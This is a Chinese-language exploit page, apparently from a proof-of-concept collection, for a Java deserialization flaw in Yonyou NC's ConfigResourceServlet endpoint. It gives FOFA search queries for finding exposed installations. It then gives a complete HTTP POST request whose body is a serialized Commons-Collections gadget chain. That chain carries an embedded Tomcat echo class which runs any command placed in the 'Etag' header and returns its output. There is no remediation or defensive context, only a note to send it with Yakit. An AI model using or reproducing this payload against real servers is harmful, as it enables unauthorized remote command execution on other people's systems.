跳到主要内容

用友NC接口ConfigResourceServlet存在反序列漏洞

用友NC接口ConfigResourceServlet存在反序列漏洞

fofa

icon_hash="1085941792"  
app="用友-UFIDA-NC"

poc

POST /servlet/~ic/nc.bs.framework.server.ConfigResourceServlet HTTP/1.1
Host: 192.168.63.129:8088
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Etag: ipconfig

{{unquote("\xac\xed\x00\x05sr\x00\x11java.util.HashSet\xbaD\x85\x95\x96\xb8\xb74\x03\x00\x00xpw\x0c\x00\x00\x00\x02?@\x00\x00\x00\x00\x00\x01sr\x004org.apache.commons.collections.keyvalue.TiedMapEntry\x8a\xad\xd2\x9b9\xc1\x1f\xdb\x02\x00\x02L\x00\x03keyt\x00\x12Ljava/lang/Object;L\x00\x03mapt\x00\x0fLjava/util/Map;xpt\x00\x04su18sr\x00*org.apache.commons.collections.map.LazyMapn\xe5\x94\x82\x9ey\x10\x94\x03\x00\x01L\x00\x07factoryt\x00,Lorg/apache/commons/collections/Transformer;xpsr\x00:org.apache.commons.collections.functors.ChainedTransformer0\xc7\x97\xec\x28z\x97\x04\x02\x00\x01[\x00\x0diTransformerst\x00-[Lorg/apache/commons/collections/Transformer;xpur\x00-[Lorg.apache.commons.collections.Transformer;\xbdV*\xf1\xd84\x18\x99\x02\x00\x00xp\x00\x00\x00\x06sr\x00;org.apache.commons.collections.functors.ConstantTransformerXv\x90\x11A\x02\xb1\x94\x02\x00\x01L\x00\x09iConstantq\x00~\x00\x03xpvr\x00*org.mozilla.javascript.DefiningClassLoader\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00xpsr\x00:org.apache.commons.collections.functors.InvokerTransformer\x87\xe8\xffk\x7b|\xce8\x02\x00\x03[\x00\x05iArgst\x00\x13[Ljava/lang/Object;L\x00\x0biMethodNamet\x00\x12Ljava/lang/String;[\x00\x0biParamTypest\x00\x12[Ljava/lang/Class;xpur\x00\x13[Ljava.lang.Object;\x90\xceX\x9f\x10s\x29l\x02\x00\x00xp\x00\x00\x00\x01ur\x00\x12[Ljava.lang.Class;\xab\x16\xd7\xae\xcb\xcdZ\x99\x02\x00\x00xp\x00\x00\x00\x00t\x00\x0egetConstructoruq\x00~\x00\x1a\x00\x00\x00\x01vq\x00~\x00\x1asq\x00~\x00\x13uq\x00~\x00\x18\x00\x00\x00\x01uq\x00~\x00\x18\x00\x00\x00\x00t\x00\x0bnewInstanceuq\x00~\x00\x1a\x00\x00\x00\x01vq\x00~\x00\x18sq\x00~\x00\x13uq\x00~\x00\x18\x00\x00\x00\x02t\x00%org.apache.logging.util.crypt.NoCryptur\x00\x02[B\xac\xf3\x17\xf8\x06\x08T\xe0\x02\x00\x00xp\x00\x00\x0f\xe2\xca\xfe\xba\xbe\x00\x00\x002\x00\xe3\x01\x00%org/apache/logging/util/crypt/NoCrypt\x07\x00\x01\x01\x00\x10java/lang/Object\x07\x00\x03\x01\x00\x06<init>\x01\x00\x03\x28\x29V\x01\x00\x04Code\x01\x00\x0fLineNumberTable\x0c\x00\x05\x00\x06\x0a\x00\x04\x00\x09\x01\x00\x01q\x01\x003\x28Ljava/lang/String;\x29Ljava/io/ByteArrayOutputStream;\x01\x00\x07execCmd\x0c\x00\x0d\x00\x0c\x0a\x00\x02\x00\x0e\x01\x00\x08<clinit>\x01\x00\x1ejava/lang/NoSuchFieldException\x07\x00\x11\x01\x00\x1fjava/lang/NoSuchMethodException\x07\x00\x13\x01\x00\x13java/lang/Exception\x07\x00\x15\x01\x00\x15java/lang/ThreadGroup\x07\x00\x17\x01\x00\x15java/lang/ClassLoader\x07\x00\x19\x01\x00\x17java/lang/reflect/Field\x07\x00\x1b\x01\x00\x13[Ljava/lang/Thread;\x07\x00\x1d\x01\x00\x10java/lang/Thread\x07\x00\x1f\x01\x00\x10java/lang/String\x07\x00!\x01\x00\x0ejava/util/List\x07\x00#\x01\x00\x1djava/io/ByteArrayOutputStream\x07\x00%\x01\x00\x0dStackMapTable\x01\x00\x0dcurrentThread\x01\x00\x14\x28\x29Ljava/lang/Thread;\x0c\x00\x28\x00\x29\x0a\x00 \x00*\x01\x00\x0egetThreadGroup\x01\x00\x19\x28\x29Ljava/lang/ThreadGroup;\x0c\x00,\x00-\x0a\x00 \x00.\x01\x00\x15getContextClassLoader\x01\x00\x19\x28\x29Ljava/lang/ClassLoader;\x0c\x000\x001\x0a\x00 \x002\x01\x00\x08getClass\x01\x00\x13\x28\x29Ljava/lang/Class;\x0c\x004\x005\x0a\x00\x04\x006\x01\x00\x07threads\x08\x008\x01\x00\x0fjava/lang/Class\x07\x00:\x01\x00\x10getDeclaredField\x01\x00-\x28Ljava/lang/String;\x29Ljava/lang/reflect/Field;\x0c\x00<\x00=\x0a\x00;\x00>\x01\x00\x0dsetAccessible\x01\x00\x04\x28Z\x29V\x0c\x00@\x00A\x0a\x00\x1c\x00B\x01\x00\x03get\x01\x00&\x28Ljava/lang/Object;\x29Ljava/lang/Object;\x0c\x00D\x00E\x0a\x00\x1c\x00F\x01\x00\x07getName\x01\x00\x14\x28\x29Ljava/lang/String;\x0c\x00H\x00I\x0a\x00 \x00J\x01\x00\x04exec\x08\x00L\x01\x00\x08contains\x01\x00\x1b\x28Ljava/lang/CharSequence;\x29Z\x0c\x00N\x00O\x0a\x00\"\x00P\x01\x00\x04http\x08\x00R\x01\x00\x06target\x08\x00T\x01\x00\x12java/lang/Runnable\x07\x00V\x01\x00\x06this$0\x08\x00X\x01\x00\x07handler\x08\x00Z\x01\x00\x0dgetSuperclass\x0c\x00\\\x005\x0a\x00;\x00]\x01\x00\x06global\x08\x00_\x01\x00\x0aprocessors\x08\x00a\x01\x00\x04size\x01\x00\x03\x28\x29I\x0c\x00c\x00d\x0b\x00$\x00e\x01\x00\x15\x28I\x29Ljava/lang/Object;\x0c\x00D\x00g\x0b\x00$\x00h\x01\x00\x03req\x08\x00j\x01\x00\x0bgetResponse\x08\x00l\x01\x00\x09getMethod\x01\x00@\x28Ljava/lang/String;[Ljava/lang/Class;\x29Ljava/lang/reflect/Method;\x0c\x00n\x00o\x0a\x00;\x00p\x01\x00\x18java/lang/reflect/Method\x07\x00r\x01\x00\x06invoke\x01\x009\x28Ljava/lang/Object;[Ljava/lang/Object;\x29Ljava/lang/Object;\x0c\x00t\x00u\x0a\x00s\x00v\x01\x00\x09getHeader\x08\x00x\x01\x00\x0aCMD_HEADER\x01\x00\x12Ljava/lang/String;\x0c\x00z\x00\x7b\x09\x00\x02\x00|\x01\x00\x07isEmpty\x01\x00\x03\x28\x29Z\x0c\x00~\x00\x7f\x0a\x00\"\x00\x80\x01\x00\x09setStatus\x08\x00\x82\x01\x00\x11java/lang/Integer\x07\x00\x84\x01\x00\x04TYPE\x01\x00\x11Ljava/lang/Class;\x0c\x00\x86\x00\x87\x09\x00\x85\x00\x88\x01\x00\x04\x28I\x29V\x0c\x00\x05\x00\x8a\x0a\x00\x85\x00\x8b\x0c\x00\x0b\x00\x0c\x0a\x00\x02\x00\x8d\x01\x00$org.apache.tomcat.util.buf.ByteChunk\x08\x00\x8f\x01\x00\x07forName\x01\x00=\x28Ljava/lang/String;ZLjava/lang/ClassLoader;\x29Ljava/lang/Class;\x0c\x00\x91\x00\x92\x0a\x00;\x00\x93\x01\x00\x0bnewInstance\x01\x00\x14\x28\x29Ljava/lang/Object;\x0c\x00\x95\x00\x96\x0a\x00;\x00\x97\x01\x00\x08setBytes\x08\x00\x99\x01\x00\x02[B\x07\x00\x9b\x01\x00\x11getDeclaredMethod\x0c\x00\x9d\x00o\x0a\x00;\x00\x9e\x01\x00\x0btoByteArray\x01\x00\x04\x28\x29[B\x0c\x00\xa0\x00\xa1\x0a\x00&\x00\xa2\x01\x00\x07valueOf\x01\x00\x16\x28I\x29Ljava/lang/Integer;\x0c\x00\xa4\x00\xa5\x0a\x00\x85\x00\xa6\x01\x00\x07doWrite\x08\x00\xa8\x01\x00\x13java.nio.ByteBuffer\x08\x00\xaa\x01\x00\x04wrap\x08\x00\xac\x01\x00\x13[Ljava/lang/String;\x07\x00\xae\x01\x00\x13java/io/InputStream\x07\x00\xb0\x01\x00\x07os.name\x08\x00\xb2\x01\x00\x10java/lang/System\x07\x00\xb4\x01\x00\x0bgetProperty\x01\x00&\x28Ljava/lang/String;\x29Ljava/lang/String;\x0c\x00\xb6\x00\xb7\x0a\x00\xb5\x00\xb8\x01\x00\x0btoLowerCase\x0c\x00\xba\x00I\x0a\x00\"\x00\xbb\x01\x00\x03win\x08\x00\xbd\x01\x00\x03cmd\x08\x00\xbf\x01\x00\x02/c\x08\x00\xc1\x01\x00\x09/bin/bash\x08\x00\xc3\x01\x00\x02-c\x08\x00\xc5\x01\x00\x11java/lang/Runtime\x07\x00\xc7\x01\x00\x0agetRuntime\x01\x00\x15\x28\x29Ljava/lang/Runtime;\x0c\x00\xc9\x00\xca\x0a\x00\xc8\x00\xcb\x01\x00\x28\x28[Ljava/lang/String;\x29Ljava/lang/Process;\x0c\x00L\x00\xcd\x0a\x00\xc8\x00\xce\x01\x00\x11java/lang/Process\x07\x00\xd0\x01\x00\x0egetInputStream\x01\x00\x17\x28\x29Ljava/io/InputStream;\x0c\x00\xd2\x00\xd3\x0a\x00\xd1\x00\xd4\x0a\x00&\x00\x09\x01\x00\x05write\x01\x00\x07\x28[BII\x29V\x0c\x00\xd7\x00\xd8\x0a\x00&\x00\xd9\x01\x00\x04read\x01\x00\x05\x28[B\x29I\x0c\x00\xdb\x00\xdc\x0a\x00\xb1\x00\xdd\x01\x00\x0aSourceFile\x01\x00\x0fTomcatEcho.java\x01\x00\x04Etag\x08\x00\xe1\x00!\x00\x02\x00\x04\x00\x00\x00\x01\x00\x09\x00z\x00\x7b\x00\x00\x00\x04\x00\x01\x00\x05\x00\x06\x00\x01\x00\x07\x00\x00\x00\x1d\x00\x01\x00\x01\x00\x00\x00\x05*\xb7\x00\x0a\xb1\x00\x00\x00\x01\x00\x08\x00\x00\x00\x06\x00\x01\x00\x00\x00\x06\x00\x09\x00\x0b\x00\x0c\x00\x01\x00\x07\x00\x00\x00\x11\x00\x01\x00\x01\x00\x00\x00\x05*\xb8\x00\x0f\xb0\x00\x00\x00\x00\x00\x08\x00\x10\x00\x06\x00\x01\x00\x07\x00\x00\x04\xb4\x00\x08\x00\x11\x00\x00\x02\xbc\x12\xe2\xb3\x00\x7d\x03;\xb8\x00+\xb6\x00/L\xb8\x00+\xb6\x003M+\xb6\x007\x129\xb6\x00?N-\x04\xb6\x00C-+\xb6\x00G\xc0\x00\x1e\xc0\x00\x1e:\x04\x036\x05\x15\x05\x19\x04\xbe\xa2\x02~\x19\x04\x15\x052:\x06\x19\x06\xc7\x00\x06\xa7\x02i\x19\x06\xb6\x00K:\x07\x19\x07\x12M\xb6\x00Q\x9a\x00\x0d\x19\x07\x12S\xb6\x00Q\x9a\x00\x06\xa7\x02K\x19\x06\xb6\x007\x12U\xb6\x00?N-\x04\xb6\x00C-\x19\x06\xb6\x00G:\x08\x19\x08\xc1\x00W\x9a\x00\x06\xa7\x02\x28\x19\x08\xb6\x007\x12Y\xb6\x00?N-\x04\xb6\x00C-\x19\x08\xb6\x00G:\x08\x19\x08\xb6\x007\x12[\xb6\x00?N\xa7\x00\x16:\x09\x19\x08\xb6\x007\xb6\x00^\xb6\x00^\x12[\xb6\x00?N-\x04\xb6\x00C-\x19\x08\xb6\x00G:\x08\x19\x08\xb6\x007\xb6\x00^\x12`\xb6\x00?N\xa7\x00\x10:\x09\x19\x08\xb6\x007\x12`\xb6\x00?N-\x04\xb6\x00C-\x19\x08\xb6\x00G:\x08\x19\x08\xb6\x007\x12b\xb6\x00?N-\x04\xb6\x00C-\x19\x08\xb6\x00G\xc0\x00$\xc0\x00$:\x09\x036\x0a\x15\x0a\x19\x09\xb9\x00f\x01\x00\xa2\x01~\x19\x09\x15\x0a\xb9\x00i\x02\x00:\x0b\x19\x0b\xb6\x007\x12k\xb6\x00?N-\x04\xb6\x00C-\x19\x0b\xb6\x00G:\x0c\x19\x0c\xb6\x007\x12m\x03\xbd\x00;\xb6\x00q\x19\x0c\x03\xbd\x00\x04\xb6\x00w:\x0d\x19\x0c\xb6\x007\x12y\x04\xbd\x00;Y\x03\x12\"S\xb6\x00q\x19\x0c\x04\xbd\x00\x04Y\x03\xb2\x00\x7dS\xb6\x00w\xc0\x00\":\x07\x19\x07\xc6\x01\x09\x19\x07\xb6\x00\x81\x9a\x01\x01\x19\x0d\xb6\x007\x12\x83\x04\xbd\x00;Y\x03\xb2\x00\x89S\xb6\x00q\x19\x0d\x04\xbd\x00\x04Y\x03\xbb\x00\x85Y\x11\x00\xc8\xb7\x00\x8cS\xb6\x00wW\x19\x07\xb8\x00\x8e:\x0e\x12\x90\x03,\xb8\x00\x94:\x0f\x19\x0f\xb6\x00\x98:\x08\x19\x0f\x12\x9a\x06\xbd\x00;Y\x03\x12\x9cSY\x04\xb2\x00\x89SY\x05\xb2\x00\x89S\xb6\x00\x9f\x19\x08\x06\xbd\x00\x04Y\x03\x19\x0e\xb6\x00\xa3SY\x04\xbb\x00\x85Y\x03\xb7\x00\x8cSY\x05\x19\x0e\xb6\x00\xa3\xbe\xb8\x00\xa7S\xb6\x00wW\x19\x0d\xb6\x007\x12\xa9\x04\xbd\x00;Y\x03\x19\x0fS\xb6\x00q\x19\x0d\x04\xbd\x00\x04Y\x03\x19\x08S\xb6\x00wW\xa7\x00S:\x0f\x12\xab\x03,\xb8\x00\x94:\x10\x19\x10\x12\xad\x04\xbd\x00;Y\x03\x12\x9cS\xb6\x00\x9f\x19\x10\x04\xbd\x00\x04Y\x03\x19\x0e\xb6\x00\xa3S\xb6\x00w:\x08\x19\x0d\xb6\x007\x12\xa9\x04\xbd\x00;Y\x03\x19\x10S\xb6\x00q\x19\x0d\x04\xbd\x00\x04Y\x03\x19\x08S\xb6\x00wW\x04;\x1a\x99\x00\x06\xa7\x00\x09\x84\x0a\x01\xa7\xfe|\x1a\x99\x00\x06\xa7\x00\x0e\xa7\x00\x05:\x06\x84\x05\x01\xa7\xfd\x80\xa7\x00\x04K\xb1\x00\x08\x00\xa4\x00\xaf\x00\xb2\x00\x12\x00\xd2\x00\xe0\x00\xe3\x00\x12\x01\xcc\x02C\x02F\x00\x14\x00<\x00H\x02\xaf\x00\x16\x00K\x00f\x02\xaf\x00\x16\x00i\x00\x89\x02\xaf\x00\x16\x00\x8c\x02\xa9\x02\xaf\x00\x16\x00\x05\x02\xb7\x02\xba\x00\x16\x00\x02\x00\x08\x00\x00\x00\xfa\x00>\x00\x05\x00\x0c\x00\x07\x00\x0d\x00\x0e\x00\x0e\x00\x15\x00\x0f\x00\x1f\x00\x10\x00$\x00\x11\x001\x00\x12\x00<\x00\x14\x00C\x00\x15\x00K\x00\x16\x00R\x00\x17\x00i\x00\x18\x00t\x00\x19\x00y\x00\x1a\x00\x81\x00\x1b\x00\x8c\x00\x1c\x00\x97\x00\x1d\x00\x9c\x00\x1e\x00\xa4\x00 \x00\xaf\x00#\x00\xb2\x00!\x00\xb4\x00\"\x00\xc5\x00$\x00\xca\x00%\x00\xd2\x00'\x00\xe0\x00*\x00\xe3\x00\x28\x00\xe5\x00\x29\x00\xf0\x00+\x00\xf5\x00,\x00\xfd\x00-\x01\x08\x00.\x01\x0d\x00/\x01\x1b\x000\x01*\x001\x015\x002\x01@\x003\x01E\x004\x01M\x005\x01f\x006\x01\x8d\x007\x01\x9a\x008\x01\xc5\x009\x01\xcc\x00;\x01\xd5\x00<\x01\xdc\x00=\x02!\x00>\x02C\x00C\x02F\x00?\x02H\x00@\x02Q\x00A\x02t\x00B\x02\x96\x00D\x02\x98\x00F\x02\x9f\x000\x02\xa5\x00H\x02\xac\x00J\x02\xaf\x00I\x02\xb1\x00\x12\x02\xb7\x00N\x02\xba\x00M\x02\xbb\x00O\x00'\x00\x00\x00\xa6\x00\x15\xff\x004\x00\x06\x01\x07\x00\x18\x07\x00\x1a\x07\x00\x1c\x07\x00\x1e\x01\x00\x00\xfc\x00\x16\x07\x00 \xfc\x00\x1a\x07\x00\"\x02\xfc\x00\"\x07\x00\x04e\x07\x00\x12\x12]\x07\x00\x12\x0c\xfd\x00-\x07\x00$\x01\xff\x01'\x00\x0f\x01\x07\x00\x18\x07\x00\x1a\x07\x00\x1c\x07\x00\x1e\x01\x07\x00 \x07\x00\"\x07\x00\x04\x07\x00$\x01\x07\x00\x04\x07\x00\x04\x07\x00\x04\x07\x00&\x00\x01\x07\x00\x14\xfc\x00O\x07\x00\x04\xf9\x00\x01\x06\xf8\x00\x05\x06\xff\x00\x02\x00\x06\x01\x07\x00\x18\x07\x00\x1a\x07\x00\x1c\x07\x00\x1e\x01\x00\x01\x07\x00\x16\xfc\x00\x01\x07\x00\x04\xfa\x00\x05\xff\x00\x02\x00\x00\x00\x01\x07\x00\x16\x00\x00\x09\x00\x0d\x00\x0c\x00\x01\x00\x07\x00\x00\x00\xe2\x00\x04\x00\x07\x00\x00\x00\x8c*\x01\xa5\x00\x0a*\xb6\x00\x81\x99\x00\x06\xa7\x00v\x01L\x12\xb3\xb8\x00\xb9\xb6\x00\xbc\x12\xbe\xb6\x00Q\x99\x00\x19\x06\xbd\x00\"Y\x03\x12\xc0SY\x04\x12\xc2SY\x05*SL\xa7\x00\x16\x06\xbd\x00\"Y\x03\x12\xc4SY\x04\x12\xc6SY\x05*SL\xb8\x00\xcc+\xb6\x00\xcf\xb6\x00\xd5M\xbb\x00&Y\xb7\x00\xd6N\x036\x04\x11\x04\x00\xbc\x08:\x05\xa7\x00\x0c-\x19\x05\x03\x15\x04\xb6\x00\xda,\x19\x05\xb6\x00\xdeY6\x04\x02\xa0\xff\xed-\xb0\xa7\x00\x08:\x06\xa7\x00\x03\x01\xb0\x00\x01\x00\x00\x00\x82\x00\x85\x00\x16\x00\x01\x00'\x00\x00\x00<\x00\x09\x0c\x02\xfc\x00'\x05\xff\x00\x12\x00\x02\x07\x00\"\x07\x00\xaf\x00\x00\xff\x00\x1f\x00\x06\x07\x00\"\x07\x00\xaf\x07\x00\xb1\x07\x00&\x01\x07\x00\x9c\x00\x00\x08\xff\x00\x0e\x00\x01\x07\x00\"\x00\x00B\x07\x00\x16\x04\x00\x00t\x00\x0bdefineClassuq\x00~\x00\x1a\x00\x00\x00\x02vr\x00\x10java.lang.String\xa0\xf0\xa48z;\xb3B\x02\x00\x00xpvq\x00~\x00\x28sq\x00~\x00\x13uq\x00~\x00\x18\x00\x00\x00\x00q\x00~\x00\"uq\x00~\x00\x1a\x00\x00\x00\x00sq\x00~\x00\x0fsr\x00\x11java.lang.Integer\x12\xe2\xa0\xa4\xf7\x81\x878\x02\x00\x01I\x00\x05valuexr\x00\x10java.lang.Number\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00xp\x00\x00\x00\x01sr\x00\x11java.util.HashMap\x05\x07\xda\xc1\xc3\x16`\xd1\x03\x00\x02F\x00\x0aloadFactorI\x00\x09thresholdxp?@\x00\x00\x00\x00\x00\x00w\x08\x00\x00\x00\x10\x00\x00\x00\x00xxx")}}

使用yakit 发包 即可查看回显内容